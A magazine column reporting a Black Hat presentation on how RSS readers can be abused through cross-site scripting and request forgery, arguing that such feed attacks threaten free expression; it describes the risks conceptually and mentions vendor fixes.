TECHSPLOITATION Last week at the infamous computer security conference Black Hat in Las Vegas, Bob Auger announced what should have already been obvious: reading blogs isn't safe. A security engineer with SPI Labs, Auger quietly revealed (www.spidynamics.com/assets/documents/HackingFeeds.pdf) that the mere act of checking out somebody's RSS feed could allow bad guys to steal money from your bank account, post Web spam from your computer, and snoop on everything you've written anonymously in that online porn community you secretly visit. This is the new dark side of all that nice free speech that’s been enabled by bloggish technologies.
Generally, free expression advocates worry about how businesses and governments censor the confessional, unedited style of bloggers. And they're right to be concerned. People posting personal rants have gotten fired for writing mean things about their bosses and been sued for criticizing litigious maniacs. But these bloggers are receiving traditional retributions for speaking openly. They say bad things about someone or some corporate entity, and that person or entity smacks them down.
As Auger and other researchers demonstrated at Black Hat, we're about to see a new threat to free expression. Massive groups of people will be punished not for what they say online but for using particular tools to say it. Auger researched several popular RSS readers — programs used to pull blog content onto your computer — including Bloglines, RSS Reader, Feed Demon, and Sharp Reader, and discovered that many of them could be turned into delivery systems for malicious code designed to force computers to, for example, post spam on other people’s blogs.
Known generally as "cross-site scripting" and "cross-site request forgery," the attacks work by covertly moving data from one location to another. And it could get worse than spamming. As Auger pointed out, everything you type into your banking Web site could get reposted elsewhere, thus allowing the bad guys to read your passwords and have fun with your money.
And blogs can spread their malicious code as quickly as they spread news. If I were a bad guy and wanted to steal a bunch of passwords, I would hide some malicious code inside a comment on a popular blog. As soon as your reader downloaded that comment, you'd be infected. Or I would start a blog that sounded particularly interesting (or pornographic), tempt a bunch of people into subscribing to my feed, and inject naughty code into their computers that way. When you consider how many people automatically repost other people's feeds onto their own blogs in a "what I'm reading" section or something like that, it’s clear how bad things could get.
But even worse, in the process of using the Web's fastest free-speech engine to wreak havoc, the people injecting nasty code into blog feeds could undermine free speech itself.
Feed injection poses a whole new set of problems for people who want to promote free expression. We're dealing with a mechanism of censorship that isn't even aware of itself as such. People who do these hacks may not have our best interests in mind — they’re trying to lie, cheat, and steal — but as an unintended consequence, they may also choke off a powerful avenue of open communication. If people begin to associate using blogs and feeds with being ripped off and spied on, many may stop reading them. Government and business couldn't have asked for a better self-censorship catalyst. Speaking out, no matter what you say, will turn you into a victim.
Luckily, there are fixes for the speech-stopping problems that Auger found — just as there are legal and social remedies for traditional forms of censorship. After talking with Auger, developers at Bloglines fixed many of the bugs he pointed out. Other vendors are working on fixing them too. And fixes for a lot of cross-site scripting and cross-site request forgery attacks can be borrowed from more protected programs.